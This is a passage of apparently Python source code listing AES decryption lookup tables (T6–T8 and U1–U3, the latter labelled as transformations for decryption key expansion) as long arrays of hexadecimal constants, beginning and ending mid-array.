0xd938d1c1, 0x8ccaa2fe, 0x98d40b36, 0xa6f581cf, 0xa57ade28, 0xdab78e26, 0x3fadbfa4, 0x2c3a9de4, 0x5078920d, 0x6a5fcc9b, 0x547e4662, 0xf68d13c2, 0x90d8b8e8, 0x2e39f75e, 0x82c3aff5, 0x9f5d80be, 0x69d0937c, 0x6fd52da9, 0xcf2512b3, 0xc8ac993b, 0x10187da7, 0xe89c636e, 0xdb3bbb7b, 0xcd267809, 0x6e5918f4, 0xec9ab701, 0x834f9aa8, 0xe6956e65, 0xaaffe67e, 0x21bccf08, 0xef15e8e6, 0xbae79bd9, 0x4a6f36ce, 0xea9f09d4, 0x29b07cd6, 0x31a4b2af, 0x2a3f2331, 0xc6a59430, 0x35a266c0, 0x744ebc37, 0xfc82caa6, 0xe090d0b0, 0x33a7d815, 0xf104984a, 0x41ecdaf7, 0x7fcd500e, 0x1791f62f, 0x764dd68d, 0x43efb04d, 0xccaa4d54, 0xe49604df, 0x9ed1b5e3, 0x4c6a881b, 0xc12c1fb8, 0x4665517f, 0x9d5eea04, 0x018c355d, 0xfa877473, 0xfb0b412e, 0xb3671d5a, 0x92dbd252, 0xe9105633, 0x6dd64713, 0x9ad7618c, 0x37a10c7a, 0x59f8148e, 0xeb133c89, 0xcea927ee, 0xb761c935, 0xe11ce5ed, 0x7a47b13c, 0x9cd2df59, 0x55f2733f, 0x1814ce79, 0x73c737bf, 0x53f7cdea, 0x5ffdaa5b, 0xdf3d6f14, 0x7844db86, 0xcaaff381, 0xb968c43e, 0x3824342c, 0xc2a3405f, 0x161dc372, 0xbce2250c, 0x283c498b, 0xff0d9541, 0x39a80171, 0x080cb3de, 0xd8b4e49c, 0x6456c190, 0x7bcb8461, 0xd532b670, 0x486c5c74, 0xd0b85742]
T6 = [0x5051f4a7, 0x537e4165, 0xc31a17a4, 0x963a275e, 0xcb3bab6b, 0xf11f9d45, 0xabacfa58, 0x934be303, 0x552030fa, 0xf6ad766d, 0x9188cc76, 0x25f5024c, 0xfc4fe5d7, 0xd7c52acb, 0x80263544, 0x8fb562a3, 0x49deb15a, 0x6725ba1b, 0x9845ea0e, 0xe15dfec0, 0x02c32f75, 0x12814cf0, 0xa38d4697, 0xc66bd3f9, 0xe7038f5f, 0x9515929c, 0xebbf6d7a, 0xda955259, 0x2dd4be83, 0xd3587421, 0x2949e069, 0x448ec9c8, 0x6a75c289, 0x78f48e79, 0x6b99583e, 0xdd27b971, 0xb6bee14f, 0x17f088ad, 0x66c920ac, 0xb47dce3a, 0x1863df4a, 0x82e51a31, 0x60975133, 0x4562537f, 0xe0b16477, 0x84bb6bae, 0x1cfe81a0, 0x94f9082b, 0x58704868, 0x198f45fd, 0x8794de6c, 0xb7527bf8, 0x23ab73d3, 0xe2724b02, 0x57e31f8f, 0x2a6655ab, 0x07b2eb28, 0x032fb5c2, 0x9a86c57b, 0xa5d33708, 0xf2302887, 0xb223bfa5, 0xba02036a, 0x5ced1682, 0x2b8acf1c, 0x92a779b4, 0xf0f307f2, 0xa14e69e2, 0xcd65daf4, 0xd50605be, 0x1fd13462, 0x8ac4a6fe, 0x9d342e53, 0xa0a2f355, 0x32058ae1, 0x75a4f6eb, 0x390b83ec, 0xaa4060ef, 0x065e719f, 0x51bd6e10, 0xf93e218a, 0x3d96dd06, 0xaedd3e05, 0x464de6bd, 0xb591548d, 0x0571c45d, 0x6f0406d4, 0xff605015, 0x241998fb, 0x97d6bde9, 0xcc894043, 0x7767d99e, 0xbdb0e842, 0x8807898b, 0x38e7195b, 0xdb79c8ee, 0x47a17c0a, 0xe97c420f, 0xc9f8841e, 0x00000000, 0x83098086, 0x48322bed, 0xac1e1170, 0x4e6c5a72, 0xfbfd0eff, 0x560f8538, 0x1e3daed5, 0x27362d39, 0x640a0fd9, 0x21685ca6, 0xd19b5b54, 0x3a24362e, 0xb10c0a67, 0x0f9357e7, 0xd2b4ee96, 0x9e1b9b91, 0x4f80c0c5, 0xa261dc20, 0x695a774b, 0x161c121a, 0x0ae293ba, 0xe5c0a02a, 0x433c22e0, 0x1d121b17, 0x0b0e090d, 0xadf28bc7, 0xb92db6a8, 0xc8141ea9, 0x8557f119, 0x4caf7507, 0xbbee99dd, 0xfda37f60, 0x9ff70126, 0xbc5c72f5, 0xc544663b, 0x345bfb7e, 0x768b4329, 0xdccb23c6, 0x68b6edfc, 0x63b8e4f1, 0xcad731dc, 0x10426385, 0x40139722, 0x2084c611, 0x7d854a24, 0xf8d2bb3d, 0x11aef932, 0x6dc729a1, 0x4b1d9e2f, 0xf3dcb230, 0xec0d8652, 0xd077c1e3, 0x6c2bb316, 0x99a970b9, 0xfa119448, 0x2247e964, 0xc4a8fc8c, 0x1aa0f03f, 0xd8567d2c, 0xef223390, 0xc787494e, 0xc1d938d1, 0xfe8ccaa2, 0x3698d40b, 0xcfa6f581, 0x28a57ade, 0x26dab78e, 0xa43fadbf, 0xe42c3a9d, 0x0d507892, 0x9b6a5fcc, 0x62547e46, 0xc2f68d13, 0xe890d8b8, 0x5e2e39f7, 0xf582c3af, 0xbe9f5d80, 0x7c69d093, 0xa96fd52d, 0xb3cf2512, 0x3bc8ac99, 0xa710187d, 0x6ee89c63, 0x7bdb3bbb, 0x09cd2678, 0xf46e5918, 0x01ec9ab7, 0xa8834f9a, 0x65e6956e, 0x7eaaffe6, 0x0821bccf, 0xe6ef15e8, 0xd9bae79b, 0xce4a6f36, 0xd4ea9f09, 0xd629b07c, 0xaf31a4b2, 0x312a3f23, 0x30c6a594, 0xc035a266, 0x37744ebc, 0xa6fc82ca, 0xb0e090d0, 0x1533a7d8, 0x4af10498, 0xf741ecda, 0x0e7fcd50, 0x2f1791f6, 0x8d764dd6, 0x4d43efb0, 0x54ccaa4d, 0xdfe49604, 0xe39ed1b5, 0x1b4c6a88, 0xb8c12c1f, 0x7f466551, 0x049d5eea, 0x5d018c35, 0x73fa8774, 0x2efb0b41, 0x5ab3671d, 0x5292dbd2, 0x33e91056, 0x136dd647, 0x8c9ad761, 0x7a37a10c, 0x8e59f814, 0x89eb133c, 0xeecea927, 0x35b761c9, 0xede11ce5, 0x3c7a47b1, 0x599cd2df, 0x3f55f273, 0x791814ce, 0xbf73c737, 0xea53f7cd, 0x5b5ffdaa, 0x14df3d6f, 0x867844db, 0x81caaff3, 0x3eb968c4, 0x2c382434, 0x5fc2a340, 0x72161dc3, 0x0cbce225, 0x8b283c49, 0x41ff0d95, 0x7139a801, 0xde080cb3, 0x9cd8b4e4, 0x906456c1, 0x617bcb84, 0x70d532b6, 0x74486c5c, 0x42d0b857]
T7 = [0xa75051f4, 0x65537e41, 0xa4c31a17, 0x5e963a27, 0x6bcb3bab, 0x45f11f9d, 0x58abacfa, 0x03934be3, 0xfa552030, 0x6df6ad76, 0x769188cc, 0x4c25f502, 0xd7fc4fe5, 0xcbd7c52a, 0x44802635, 0xa38fb562, 0x5a49deb1, 0x1b6725ba, 0x0e9845ea, 0xc0e15dfe, 0x7502c32f, 0xf012814c, 0x97a38d46, 0xf9c66bd3, 0x5fe7038f, 0x9c951592, 0x7aebbf6d, 0x59da9552, 0x832dd4be, 0x21d35874, 0x692949e0, 0xc8448ec9, 0x896a75c2, 0x7978f48e, 0x3e6b9958, 0x71dd27b9, 0x4fb6bee1, 0xad17f088, 0xac66c920, 0x3ab47dce, 0x4a1863df, 0x3182e51a, 0x33609751, 0x7f456253, 0x77e0b164, 0xae84bb6b, 0xa01cfe81, 0x2b94f908, 0x68587048, 0xfd198f45, 0x6c8794de, 0xf8b7527b, 0xd323ab73, 0x02e2724b, 0x8f57e31f, 0xab2a6655, 0x2807b2eb, 0xc2032fb5, 0x7b9a86c5, 0x08a5d337, 0x87f23028, 0xa5b223bf, 0x6aba0203, 0x825ced16, 0x1c2b8acf, 0xb492a779, 0xf2f0f307, 0xe2a14e69, 0xf4cd65da, 0xbed50605, 0x621fd134, 0xfe8ac4a6, 0x539d342e, 0x55a0a2f3, 0xe132058a, 0xeb75a4f6, 0xec390b83, 0xefaa4060, 0x9f065e71, 0x1051bd6e, 0x8af93e21, 0x063d96dd, 0x05aedd3e, 0xbd464de6, 0x8db59154, 0x5d0571c4, 0xd46f0406, 0x15ff6050, 0xfb241998, 0xe997d6bd, 0x43cc8940, 0x9e7767d9, 0x42bdb0e8, 0x8b880789, 0x5b38e719, 0xeedb79c8, 0x0a47a17c, 0x0fe97c42, 0x1ec9f884, 0x00000000, 0x86830980, 0xed48322b, 0x70ac1e11, 0x724e6c5a, 0xfffbfd0e, 0x38560f85, 0xd51e3dae, 0x3927362d, 0xd9640a0f, 0xa621685c, 0x54d19b5b, 0x2e3a2436, 0x67b10c0a, 0xe70f9357, 0x96d2b4ee, 0x919e1b9b, 0xc54f80c0, 0x20a261dc, 0x4b695a77, 0x1a161c12, 0xba0ae293, 0x2ae5c0a0, 0xe0433c22, 0x171d121b, 0x0d0b0e09, 0xc7adf28b, 0xa8b92db6, 0xa9c8141e, 0x198557f1, 0x074caf75, 0xddbbee99, 0x60fda37f, 0x269ff701, 0xf5bc5c72, 0x3bc54466, 0x7e345bfb, 0x29768b43, 0xc6dccb23, 0xfc68b6ed, 0xf163b8e4, 0xdccad731, 0x85104263, 0x22401397, 0x112084c6, 0x247d854a, 0x3df8d2bb, 0x3211aef9, 0xa16dc729, 0x2f4b1d9e, 0x30f3dcb2, 0x52ec0d86, 0xe3d077c1, 0x166c2bb3, 0xb999a970, 0x48fa1194, 0x642247e9, 0x8cc4a8fc, 0x3f1aa0f0, 0x2cd8567d, 0x90ef2233, 0x4ec78749, 0xd1c1d938, 0xa2fe8cca, 0x0b3698d4, 0x81cfa6f5, 0xde28a57a, 0x8e26dab7, 0xbfa43fad, 0x9de42c3a, 0x920d5078, 0xcc9b6a5f, 0x4662547e, 0x13c2f68d, 0xb8e890d8, 0xf75e2e39, 0xaff582c3, 0x80be9f5d, 0x937c69d0, 0x2da96fd5, 0x12b3cf25, 0x993bc8ac, 0x7da71018, 0x636ee89c, 0xbb7bdb3b, 0x7809cd26, 0x18f46e59, 0xb701ec9a, 0x9aa8834f, 0x6e65e695, 0xe67eaaff, 0xcf0821bc, 0xe8e6ef15, 0x9bd9bae7, 0x36ce4a6f, 0x09d4ea9f, 0x7cd629b0, 0xb2af31a4, 0x23312a3f, 0x9430c6a5, 0x66c035a2, 0xbc37744e, 0xcaa6fc82, 0xd0b0e090, 0xd81533a7, 0x984af104, 0xdaf741ec, 0x500e7fcd, 0xf62f1791, 0xd68d764d, 0xb04d43ef, 0x4d54ccaa, 0x04dfe496, 0xb5e39ed1, 0x881b4c6a, 0x1fb8c12c, 0x517f4665, 0xea049d5e, 0x355d018c, 0x7473fa87, 0x412efb0b, 0x1d5ab367, 0xd25292db, 0x5633e910, 0x47136dd6, 0x618c9ad7, 0x0c7a37a1, 0x148e59f8, 0x3c89eb13, 0x27eecea9, 0xc935b761, 0xe5ede11c, 0xb13c7a47, 0xdf599cd2, 0x733f55f2, 0xce791814, 0x37bf73c7, 0xcdea53f7, 0xaa5b5ffd, 0x6f14df3d, 0xdb867844, 0xf381caaf, 0xc43eb968, 0x342c3824, 0x405fc2a3, 0xc372161d, 0x250cbce2, 0x498b283c, 0x9541ff0d, 0x017139a8, 0xb3de080c, 0xe49cd8b4, 0xc1906456, 0x84617bcb, 0xb670d532, 0x5c74486c, 0x5742d0b8]
T8 = [0xf4a75051, 0x4165537e, 0x17a4c31a, 0x275e963a, 0xab6bcb3b, 0x9d45f11f, 0xfa58abac, 0xe303934b, 0x30fa5520, 0x766df6ad, 0xcc769188, 0x024c25f5, 0xe5d7fc4f, 0x2acbd7c5, 0x35448026, 0x62a38fb5, 0xb15a49de, 0xba1b6725, 0xea0e9845, 0xfec0e15d, 0x2f7502c3, 0x4cf01281, 0x4697a38d, 0xd3f9c66b, 0x8f5fe703, 0x929c9515, 0x6d7aebbf, 0x5259da95, 0xbe832dd4, 0x7421d358, 0xe0692949, 0xc9c8448e, 0xc2896a75, 0x8e7978f4, 0x583e6b99, 0xb971dd27, 0xe14fb6be, 0x88ad17f0, 0x20ac66c9, 0xce3ab47d, 0xdf4a1863, 0x1a3182e5, 0x51336097, 0x537f4562, 0x6477e0b1, 0x6bae84bb, 0x81a01cfe, 0x082b94f9, 0x48685870, 0x45fd198f, 0xde6c8794, 0x7bf8b752, 0x73d323ab, 0x4b02e272, 0x1f8f57e3, 0x55ab2a66, 0xeb2807b2, 0xb5c2032f, 0xc57b9a86, 0x3708a5d3, 0x2887f230, 0xbfa5b223, 0x036aba02, 0x16825ced, 0xcf1c2b8a, 0x79b492a7, 0x07f2f0f3, 0x69e2a14e, 0xdaf4cd65, 0x05bed506, 0x34621fd1, 0xa6fe8ac4, 0x2e539d34, 0xf355a0a2, 0x8ae13205, 0xf6eb75a4, 0x83ec390b, 0x60efaa40, 0x719f065e, 0x6e1051bd, 0x218af93e, 0xdd063d96, 0x3e05aedd, 0xe6bd464d, 0x548db591, 0xc45d0571, 0x06d46f04, 0x5015ff60, 0x98fb2419, 0xbde997d6, 0x4043cc89, 0xd99e7767, 0xe842bdb0, 0x898b8807, 0x195b38e7, 0xc8eedb79, 0x7c0a47a1, 0x420fe97c, 0x841ec9f8, 0x00000000, 0x80868309, 0x2bed4832, 0x1170ac1e, 0x5a724e6c, 0x0efffbfd, 0x8538560f, 0xaed51e3d, 0x2d392736, 0x0fd9640a, 0x5ca62168, 0x5b54d19b, 0x362e3a24, 0x0a67b10c, 0x57e70f93, 0xee96d2b4, 0x9b919e1b, 0xc0c54f80, 0xdc20a261, 0x774b695a, 0x121a161c, 0x93ba0ae2, 0xa02ae5c0, 0x22e0433c, 0x1b171d12, 0x090d0b0e, 0x8bc7adf2, 0xb6a8b92d, 0x1ea9c814, 0xf1198557, 0x75074caf, 0x99ddbbee, 0x7f60fda3, 0x01269ff7, 0x72f5bc5c, 0x663bc544, 0xfb7e345b, 0x4329768b, 0x23c6dccb, 0xedfc68b6, 0xe4f163b8, 0x31dccad7, 0x63851042, 0x97224013, 0xc6112084, 0x4a247d85, 0xbb3df8d2, 0xf93211ae, 0x29a16dc7, 0x9e2f4b1d, 0xb230f3dc, 0x8652ec0d, 0xc1e3d077, 0xb3166c2b, 0x70b999a9, 0x9448fa11, 0xe9642247, 0xfc8cc4a8, 0xf03f1aa0, 0x7d2cd856, 0x3390ef22, 0x494ec787, 0x38d1c1d9, 0xcaa2fe8c, 0xd40b3698, 0xf581cfa6, 0x7ade28a5, 0xb78e26da, 0xadbfa43f, 0x3a9de42c, 0x78920d50, 0x5fcc9b6a, 0x7e466254, 0x8d13c2f6, 0xd8b8e890, 0x39f75e2e, 0xc3aff582, 0x5d80be9f, 0xd0937c69, 0xd52da96f, 0x2512b3cf, 0xac993bc8, 0x187da710, 0x9c636ee8, 0x3bbb7bdb, 0x267809cd, 0x5918f46e, 0x9ab701ec, 0x4f9aa883, 0x956e65e6, 0xffe67eaa, 0xbccf0821, 0x15e8e6ef, 0xe79bd9ba, 0x6f36ce4a, 0x9f09d4ea, 0xb07cd629, 0xa4b2af31, 0x3f23312a, 0xa59430c6, 0xa266c035, 0x4ebc3774, 0x82caa6fc, 0x90d0b0e0, 0xa7d81533, 0x04984af1, 0xecdaf741, 0xcd500e7f, 0x91f62f17, 0x4dd68d76, 0xefb04d43, 0xaa4d54cc, 0x9604dfe4, 0xd1b5e39e, 0x6a881b4c, 0x2c1fb8c1, 0x65517f46, 0x5eea049d, 0x8c355d01, 0x877473fa, 0x0b412efb, 0x671d5ab3, 0xdbd25292, 0x105633e9, 0xd647136d, 0xd7618c9a, 0xa10c7a37, 0xf8148e59, 0x133c89eb, 0xa927eece, 0x61c935b7, 0x1ce5ede1, 0x47b13c7a, 0xd2df599c, 0xf2733f55, 0x14ce7918, 0xc737bf73, 0xf7cdea53, 0xfdaa5b5f, 0x3d6f14df, 0x44db8678, 0xaff381ca, 0x68c43eb9, 0x24342c38, 0xa3405fc2, 0x1dc37216, 0xe2250cbc, 0x3c498b28, 0x0d9541ff, 0xa8017139, 0x0cb3de08, 0xb4e49cd8, 0x56c19064, 0xcb84617b, 0x32b670d5, 0x6c5c7448, 0xb85742d0]
# Transformations for decryption key expansion
U1 = [0x00000000, 0x0e090d0b, 0x1c121a16, 0x121b171d, 0x3824342c, 0x362d3927, 0x24362e3a, 0x2a3f2331, 0x70486858, 0x7e416553, 0x6c5a724e, 0x62537f45, 0x486c5c74, 0x4665517f, 0x547e4662, 0x5a774b69, 0xe090d0b0, 0xee99ddbb, 0xfc82caa6, 0xf28bc7ad, 0xd8b4e49c, 0xd6bde997, 0xc4a6fe8a, 0xcaaff381, 0x90d8b8e8, 0x9ed1b5e3, 0x8ccaa2fe, 0x82c3aff5, 0xa8fc8cc4, 0xa6f581cf, 0xb4ee96d2, 0xbae79bd9, 0xdb3bbb7b, 0xd532b670, 0xc729a16d, 0xc920ac66, 0xe31f8f57, 0xed16825c, 0xff0d9541, 0xf104984a, 0xab73d323, 0xa57ade28, 0xb761c935, 0xb968c43e, 0x9357e70f, 0x9d5eea04, 0x8f45fd19, 0x814cf012, 0x3bab6bcb, 0x35a266c0, 0x27b971dd, 0x29b07cd6, 0x038f5fe7, 0x0d8652ec, 0x1f9d45f1, 0x119448fa, 0x4be30393, 0x45ea0e98, 0x57f11985, 0x59f8148e, 0x73c737bf, 0x7dce3ab4, 0x6fd52da9, 0x61dc20a2, 0xad766df6, 0xa37f60fd, 0xb16477e0, 0xbf6d7aeb, 0x955259da, 0x9b5b54d1, 0x894043cc, 0x87494ec7, 0xdd3e05ae, 0xd33708a5, 0xc12c1fb8, 0xcf2512b3, 0xe51a3182, 0xeb133c89, 0xf9082b94, 0xf701269f, 0x4de6bd46, 0x43efb04d, 0x51f4a750, 0x5ffdaa5b, 0x75c2896a, 0x7bcb8461, 0x69d0937c, 0x67d99e77, 0x3daed51e, 0x33a7d815, 0x21bccf08, 0x2fb5c203, 0x058ae132, 0x0b83ec39, 0x1998fb24, 0x1791f62f, 0x764dd68d, 0x7844db86, 0x6a5fcc9b, 0x6456c190, 0x4e69e2a1, 0x4060efaa, 0x527bf8b7, 0x5c72f5bc, 0x0605bed5, 0x080cb3de, 0x1a17a4c3, 0x141ea9c8, 0x3e218af9, 0x302887f2, 0x223390ef, 0x2c3a9de4, 0x96dd063d, 0x98d40b36, 0x8acf1c2b, 0x84c61120, 0xaef93211, 0xa0f03f1a, 0xb2eb2807, 0xbce2250c, 0xe6956e65, 0xe89c636e, 0xfa877473, 0xf48e7978, 0xdeb15a49, 0xd0b85742, 0xc2a3405f, 0xccaa4d54, 0x41ecdaf7, 0x4fe5d7fc, 0x5dfec0e1, 0x53f7cdea, 0x79c8eedb, 0x77c1e3d0, 0x65daf4cd, 0x6bd3f9c6, 0x31a4b2af, 0x3fadbfa4, 0x2db6a8b9, 0x23bfa5b2, 0x09808683, 0x07898b88, 0x15929c95, 0x1b9b919e, 0xa17c0a47, 0xaf75074c, 0xbd6e1051, 0xb3671d5a, 0x99583e6b, 0x97513360, 0x854a247d, 0x8b432976, 0xd134621f, 0xdf3d6f14, 0xcd267809, 0xc32f7502, 0xe9105633, 0xe7195b38, 0xf5024c25, 0xfb0b412e, 0x9ad7618c, 0x94de6c87, 0x86c57b9a, 0x88cc7691, 0xa2f355a0, 0xacfa58ab, 0xbee14fb6, 0xb0e842bd, 0xea9f09d4, 0xe49604df, 0xf68d13c2, 0xf8841ec9, 0xd2bb3df8, 0xdcb230f3, 0xcea927ee, 0xc0a02ae5, 0x7a47b13c, 0x744ebc37, 0x6655ab2a, 0x685ca621, 0x42638510, 0x4c6a881b, 0x5e719f06, 0x5078920d, 0x0a0fd964, 0x0406d46f, 0x161dc372, 0x1814ce79, 0x322bed48, 0x3c22e043, 0x2e39f75e, 0x2030fa55, 0xec9ab701, 0xe293ba0a, 0xf088ad17, 0xfe81a01c, 0xd4be832d, 0xdab78e26, 0xc8ac993b, 0xc6a59430, 0x9cd2df59, 0x92dbd252, 0x80c0c54f, 0x8ec9c844, 0xa4f6eb75, 0xaaffe67e, 0xb8e4f163, 0xb6edfc68, 0x0c0a67b1, 0x02036aba, 0x10187da7, 0x1e1170ac, 0x342e539d, 0x3a275e96, 0x283c498b, 0x26354480, 0x7c420fe9, 0x724b02e2, 0x605015ff, 0x6e5918f4, 0x44663bc5, 0x4a6f36ce, 0x587421d3, 0x567d2cd8, 0x37a10c7a, 0x39a80171, 0x2bb3166c, 0x25ba1b67, 0x0f853856, 0x018c355d, 0x13972240, 0x1d9e2f4b, 0x47e96422, 0x49e06929, 0x5bfb7e34, 0x55f2733f, 0x7fcd500e, 0x71c45d05, 0x63df4a18, 0x6dd64713, 0xd731dcca, 0xd938d1c1, 0xcb23c6dc, 0xc52acbd7, 0xef15e8e6, 0xe11ce5ed, 0xf307f2f0, 0xfd0efffb, 0xa779b492, 0xa970b999, 0xbb6bae84, 0xb562a38f, 0x9f5d80be, 0x91548db5, 0x834f9aa8, 0x8d4697a3]
U2 = [0x00000000, 0x0b0e090d, 0x161c121a, 0x1d121b17, 0x2c382434, 0x27362d39, 0x3a24362e, 0x312a3f23, 0x58704868, 0x537e4165, 0x4e6c5a72, 0x4562537f, 0x74486c5c, 0x7f466551, 0x62547e46, 0x695a774b, 0xb0e090d0, 0xbbee99dd, 0xa6fc82ca, 0xadf28bc7, 0x9cd8b4e4, 0x97d6bde9, 0x8ac4a6fe, 0x81caaff3, 0xe890d8b8, 0xe39ed1b5, 0xfe8ccaa2, 0xf582c3af, 0xc4a8fc8c, 0xcfa6f581, 0xd2b4ee96, 0xd9bae79b, 0x7bdb3bbb, 0x70d532b6, 0x6dc729a1, 0x66c920ac, 0x57e31f8f, 0x5ced1682, 0x41ff0d95, 0x4af10498, 0x23ab73d3, 0x28a57ade, 0x35b761c9, 0x3eb968c4, 0x0f9357e7, 0x049d5eea, 0x198f45fd, 0x12814cf0, 0xcb3bab6b, 0xc035a266, 0xdd27b971, 0xd629b07c, 0xe7038f5f, 0xec0d8652, 0xf11f9d45, 0xfa119448, 0x934be303, 0x9845ea0e, 0x8557f119, 0x8e59f814, 0xbf73c737, 0xb47dce3a, 0xa96fd52d, 0xa261dc20, 0xf6ad766d, 0xfda37f60, 0xe0b16477, 0xebbf6d7a, 0xda955259, 0xd19b5b54, 0xcc894043, 0xc787494e, 0xaedd3e05, 0xa5d33708, 0xb8c12c1f, 0xb3cf2512, 0x82e51a31, 0x89eb133c, 0x94f9082b, 0x9ff70126, 0x464de6bd, 0x4d43efb0, 0x5051f4a7, 0x5b5ffdaa, 0x6a75c289, 0x617bcb84, 0x7c69d093, 0x7767d99e, 0x1e3daed5, 0x1533a7d8, 0x0821bccf, 0x032fb5c2, 0x32058ae1, 0x390b83ec, 0x241998fb, 0x2f1791f6, 0x8d764dd6, 0x867844db, 0x9b6a5fcc, 0x906456c1, 0xa14e69e2, 0xaa4060ef, 0xb7527bf8, 0xbc5c72f5, 0xd50605be, 0xde080cb3, 0xc31a17a4, 0xc8141ea9, 0xf93e218a, 0xf2302887, 0xef223390, 0xe42c3a9d, 0x3d96dd06, 0x3698d40b, 0x2b8acf1c, 0x2084c611, 0x11aef932, 0x1aa0f03f, 0x07b2eb28, 0x0cbce225, 0x65e6956e, 0x6ee89c63, 0x73fa8774, 0x78f48e79, 0x49deb15a, 0x42d0b857, 0x5fc2a340, 0x54ccaa4d, 0xf741ecda, 0xfc4fe5d7, 0xe15dfec0, 0xea53f7cd, 0xdb79c8ee, 0xd077c1e3, 0xcd65daf4, 0xc66bd3f9, 0xaf31a4b2, 0xa43fadbf, 0xb92db6a8, 0xb223bfa5, 0x83098086, 0x8807898b, 0x9515929c, 0x9e1b9b91, 0x47a17c0a, 0x4caf7507, 0x51bd6e10, 0x5ab3671d, 0x6b99583e, 0x60975133, 0x7d854a24, 0x768b4329, 0x1fd13462, 0x14df3d6f, 0x09cd2678, 0x02c32f75, 0x33e91056, 0x38e7195b, 0x25f5024c, 0x2efb0b41, 0x8c9ad761, 0x8794de6c, 0x9a86c57b, 0x9188cc76, 0xa0a2f355, 0xabacfa58, 0xb6bee14f, 0xbdb0e842, 0xd4ea9f09, 0xdfe49604, 0xc2f68d13, 0xc9f8841e, 0xf8d2bb3d, 0xf3dcb230, 0xeecea927, 0xe5c0a02a, 0x3c7a47b1, 0x37744ebc, 0x2a6655ab, 0x21685ca6, 0x10426385, 0x1b4c6a88, 0x065e719f, 0x0d507892, 0x640a0fd9, 0x6f0406d4, 0x72161dc3, 0x791814ce, 0x48322bed, 0x433c22e0, 0x5e2e39f7, 0x552030fa, 0x01ec9ab7, 0x0ae293ba, 0x17f088ad, 0x1cfe81a0, 0x2dd4be83, 0x26dab78e, 0x3bc8ac99, 0x30c6a594, 0x599cd2df, 0x5292dbd2, 0x4f80c0c5, 0x448ec9c8, 0x75a4f6eb, 0x7eaaffe6, 0x63b8e4f1, 0x68b6edfc, 0xb10c0a67, 0xba02036a, 0xa710187d, 0xac1e1170, 0x9d342e53, 0x963a275e, 0x8b283c49, 0x80263544, 0xe97c420f, 0xe2724b02, 0xff605015, 0xf46e5918, 0xc544663b, 0xce4a6f36, 0xd3587421, 0xd8567d2c, 0x7a37a10c, 0x7139a801, 0x6c2bb316, 0x6725ba1b, 0x560f8538, 0x5d018c35, 0x40139722, 0x4b1d9e2f, 0x2247e964, 0x2949e069, 0x345bfb7e, 0x3f55f273, 0x0e7fcd50, 0x0571c45d, 0x1863df4a, 0x136dd647, 0xcad731dc, 0xc1d938d1, 0xdccb23c6, 0xd7c52acb, 0xe6ef15e8, 0xede11ce5, 0xf0f307f2, 0xfbfd0eff, 0x92a779b4, 0x99a970b9, 0x84bb6bae, 0x8fb562a3, 0xbe9f5d80, 0xb591548d, 0xa8834f9a, 0xa38d4697]
U3 = [0x00000000, 0x0d0b0e09, 0x1a161c12, 0x171d121b, 0x342c3824, 0x3927362d, 0x2e3a2436, 0x23312a3f, 0x68587048, 0x65537e41, 0x724e6c5a, 0x7f456253, 0x5c74486c, 0x517f4665, 0x4662547e, 0x4b695a77, 0xd0b0e090, 0xddbbee99, 0xcaa6fc82, 0xc7adf28b, 0xe49cd8b4, 0xe997d6bd, 0xfe8ac4a6, 0xf381caaf, 0xb8e890d8, 0xb5e39ed1, 0xa2fe8cca, 0xaff582c3, 0x8cc4a8fc, 0x81cfa6f5, 0x96d2b4ee, 0x9bd9bae7, 0xbb7bdb3b, 0xb670d532, 0xa16dc729, 0xac66c920, 0x8f57e31f, 0x825ced16, 0x9541ff0d, 0x984af104, 0xd323ab73, 0xde28a57a, 0xc935b761, 0xc43eb968, 0xe70f9357, 0xea049d5e, 0xfd198f45, 0xf012814c, 0x6bcb3bab, 0x66c035a2, 0x71dd27b9, 0x7cd629b0, 0x5fe7038f, 0x52ec0d86, 0x45f11f9d, 0x48fa1194, 0x03934be3, 0x0e9845ea, 0x198557f1, 0x148e59f8, 0x37bf73c7, 0x3ab47dce, 0x2da96fd5, 0x20a261dc, 0x6df6ad76, 0x60fda37f, 0x77e0b164, 0x7aebbf6d, 0x59da9552, 0x54d19b5b, 0x43cc8940, 0x4ec78749, 0x05aedd3e, 0x08a5d337, 0x1fb8c12c, 0x12b3cf25, 0x3182e51a, 0x3c89eb13, 0x2b94f908, 0x269ff701, 0xbd464de6, 0xb04d43ef, 0xa75051f4, 0xaa5b5ffd, 0x896a75c2, 0x84617bcb, 0x937c69d0, 0x9e7767d9, 0xd51e3dae, 0xd81533a7, 0xcf0821bc, 0xc2032fb5, 0xe132058a, 0xec390b83, 0xfb241998, 0xf62f1791, 0xd68d764d, 0xdb867844, 0xcc9b6a5f, 0xc1906456, 0xe2a14e69, 0xefaa4060, 0xf8b7527b, 0xf5bc5c72, 0xbed50605, 0xb3de080c, 0xa4c31a17, 0xa9c8141e, 0x8af93e21, 0x87f23028, 0x90ef2233, 0x9de42c3a, 0x063d96dd, 0x0b3698d4, 0x1c2b8acf, 0x112084c6, 0x3211aef9, 0x3f1aa0f0, 0x2807b2eb, 0x250cbce2, 0x6e65e695, 0x636ee89c, 0x7473fa87, 0x7978f48e, 0x5a49deb1, 0x5742d0b8, 0x405fc2a3, 0x4d54ccaa, 0xdaf741ec, 0xd7fc4fe5, 0xc0e15dfe, 0xcdea53f7, 0xeedb79c8, 0xe3d077c1, 0xf4cd65da, 0xf9c66bd3, 0xb2af31a4, 0xbfa43fad, 0xa8b92db6, 0xa5b223bf, 0x86830980, 0x8b880789, 0x9c951592, 0x919e1b9b, 0x0a47a17c, 0x074caf75, 0x1051bd6e, 0x1d5ab367, 0x3e6b9958, 0x33609751, 0x247d854a, 0x29768b43, 0x621fd134, 0x6f14df3d, 0x7809cd26, 0x7502c32f, 0x5633e910, 0x5b38e719, 0x4c25f502, 0x412efb0b, 0x618c9ad7, 0x6c8794de, 0x7b9a86c5, 0x769188cc, 0x55a0a2f3, 0x58abacfa, 0x4fb6bee1, 0x42bdb0e8, 0x09d4ea9f, 0x04dfe496, 0x13c2f68d, 0x1ec9f884, 0x3df8d2bb, 0x30f3dcb2, 0x27eecea9, 0x2ae5c0a0, 0xb13c7a47, 0xbc37744e, 0xab2a6655, 0xa621685c, 0x85104263, 0x881b4c6a, 0x9f065e71, 0x920d5078, 0xd9640a0f, 0xd46f0406, 0xc372161d, 0xce791814, 0xed48322b, 0xe0433c22, 0xf75e2e39, 0xfa552030, 0xb701ec9a, 0xba0ae293, 0xad17f088, 0xa01cfe81, 0x832dd4be, 0x8e26dab7, 0x993bc8ac, 0x9430c6a5, 0xdf599cd2, 0xd25292db, 0xc54f80c0, 0xc8448ec9, 0xeb75a4f6, 0xe67eaaff, 0xf163b8e4, 0xfc68b6ed, 0x67b10c0a, 0x6aba0203, 0x7da71018, 